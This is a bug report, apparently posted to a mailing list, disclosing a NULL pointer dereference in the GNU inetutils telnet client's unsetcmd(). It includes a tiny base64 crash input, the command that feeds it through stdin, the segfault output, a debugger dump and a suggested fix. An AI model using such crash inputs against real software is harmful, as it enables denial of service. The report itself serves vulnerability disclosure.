
NULL Pointer Dereference in unsetcmd() at inetutils/telnet/commands.c:1227


From: AiDai
Subject: NULL Pointer Dereference in unsetcmd() at inetutils/telnet/commands.c:1227
Date: Thu, 23 Dec 2021 21:17:45 +0800

# NULL Pointer Dereference in unsetcmd() at inetutils/telnet/commands.c:1227

## Description

A NULL pointer dereference was discovered in unsetcmd() at inetutils/telnet/commands.c:1227. The faulting instruction is the store `*(ct->charp) = _POSIX_VDISABLE;`: the register dump below shows RAX = 0x0 at `mov byte ptr [rax], 0`, i.e. `ct->charp` is NULL for the Setlist entry that getset() matched (RDI points at Setlist+128, whose name string is a single space). The separator rows of Setlist presumably carry a NULL `charp` — TODO confirm against the Setlist definition — so any argument that matches one of them reaches this store unguarded; a fix would reject entries with a NULL `charp` in getset() or check `ct->charp` before the write. The result is a segmentation fault and crash of the telnet client. Note the impact: the crash is driven by the client's own command input (stdin / a script), not by data from the remote server, so this is a local denial of service rather than a remotely triggerable issue.

**version**

```
./telnet --version
telnet (GNU inetutils) 2.2.16-cf091
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by many authors.
```

**System information**
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

## Proof of Concept

**poc** (base64; decodes to the 4 bytes `u`, `0x0b`, `"`, ` ` — apparently the abbreviated `unset` command, a vertical-tab separator, and a quoted argument consisting of a single space)

```
base64 poc
dQsiIA==
```

**command:**

```
./telnet < ./poc
```

**Result**

```
./telnet < ./poc
[3]    2387443 segmentation fault  ./telnet < ./poc
```

**gdb**

```
Program received signal SIGSEGV, Segmentation fault.
unsetcmd (argc=0, argv=0x55555557c110 <margv+16>) at commands.c:1227
1227              *(ct->charp) = _POSIX_VDISABLE;
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
 RAX  0x0
 RBX  0x55555557bee2 (line+2) ◂— 0x20 /* ' ' */
 RCX  0xfbad2098
 RDX  0x0
 RDI  0x55555557ab20 (Setlist+128) —▸ 0x555555571a7d ◂— 0x67756265640020 /* ' ' */
 RSI  0x555555571a7d ◂— 0x67756265640020 /* ' ' */
 R8   0x55555557bee0 (line) ◂— 0x200075 /* 'u' */
 R9   0x7c
 R10  0x555555572e4c ◂— 0x69626d413f00203e /* '> ' */
 R11  0x246
 R12  0x555555559d20 (_start) ◂— endbr64
 R13  0x7fffffffe210 ◂— 0x1
 R14  0x0
 R15  0x0
 RBP  0x7fffffffe060 —▸ 0x7fffffffe090 —▸ 0x7fffffffe120 ◂— 0x0
 RSP  0x7fffffffe030 —▸ 0x55555557c110 (margv+16) ◂— 0x0
 RIP  0x55555555b592 (unsetcmd+717) ◂— mov    byte ptr [rax], 0
──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
 ► 0x55555555b592 <unsetcmd+717>    mov    byte ptr [rax], 0
   0x55555555b595 <unsetcmd+720>    mov    rax, qword ptr [rbp - 0x20]
   0x55555555b599 <unsetcmd+724>    mov    rax, qword ptr [rax + 0x18]
   0x55555555b59d <unsetcmd+728>    movzx  eax, byte ptr [rax]
   0x55555555b5a0 <unsetcmd+731>    movzx  eax, al
   0x55555555b5a3 <unsetcmd+734>    mov    edi, eax
   0x55555555b5a5 <unsetcmd+736>    call   control                <control>

   0x55555555b5aa <unsetcmd+741>    mov    rdx, rax
   0x55555555b5ad <unsetcmd+744>    mov    rax, qword ptr [rbp - 0x20]
   0x55555555b5b1 <unsetcmd+748>    mov    rax, qword ptr [rax]
   0x55555555b5b4 <unsetcmd+751>    mov    rsi, rax
──────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────
In file: /root/disk2/fuzzing/inetutils/inetutils/telnet/commands.c
   1222           (*ct->handler) (0);
   1223           printf ("%s reset to \"%s\".\n", ct->name, (char *) ct->charp);
   1224         }
   1225       else
   1226         {
 ► 1227           *(ct->charp) = _POSIX_VDISABLE;
   1228           printf ("%s character is '%s'.\n", ct->name,
   1229                   control (*(ct->charp)));
   1230         }
   1231     }
   1232   return 1;
──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
00:0000│ rsp 0x7fffffffe030 —▸ 0x55555557c110 (margv+16) ◂— 0x0
01:0008│     0x7fffffffe038 ◂— 0x5555d867
02:0010│     0x7fffffffe040 —▸ 0x55555557ab20 (Setlist+128) —▸ 0x555555571a7d ◂— 0x67756265640020 /* ' ' */
03:0018│     0x7fffffffe048 —▸ 0x55555557bee0 (line) ◂— 0x200075 /* 'u' */
04:0020│     0x7fffffffe050 ◂— 0x0
05:0028│     0x7fffffffe058 —▸ 0x55555557b360 (cmdtab+256) —▸ 0x555555572e2f ◂— 0x6f74007465736e75 /* 'unset' */
06:0030│ rbp 0x7fffffffe060 —▸ 0x7fffffffe090 —▸ 0x7fffffffe120 ◂— 0x0
07:0038│     0x7fffffffe068 —▸ 0x55555555dab9 (command+550) ◂— test   eax, eax
────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
 ► f 0   0x55555555b592 unsetcmd+717
   f 1   0x55555555dab9 command+550
   f 2   0x55555555e3c8 main+776
   f 3   0x7ffff7db50b3 __libc_start_main+243
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0  unsetcmd (argc=0, argv=0x55555557c110 <margv+16>) at commands.c:1227
#1  0x000055555555dab9 in command (top=1, tbuf=0x0, cnt=0) at commands.c:3044
#2  0x000055555555e3c8 in main (argc=0, argv=0x7fffffffe220) at main.c:423
#3  0x00007ffff7db50b3 in __libc_start_main (main=0x55555555e0c0 <main>, argc=1, argv=0x7fffffffe218, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe208) at ../csu/libc-start.c:308
#4  0x0000555555559d4e in _start ()
```

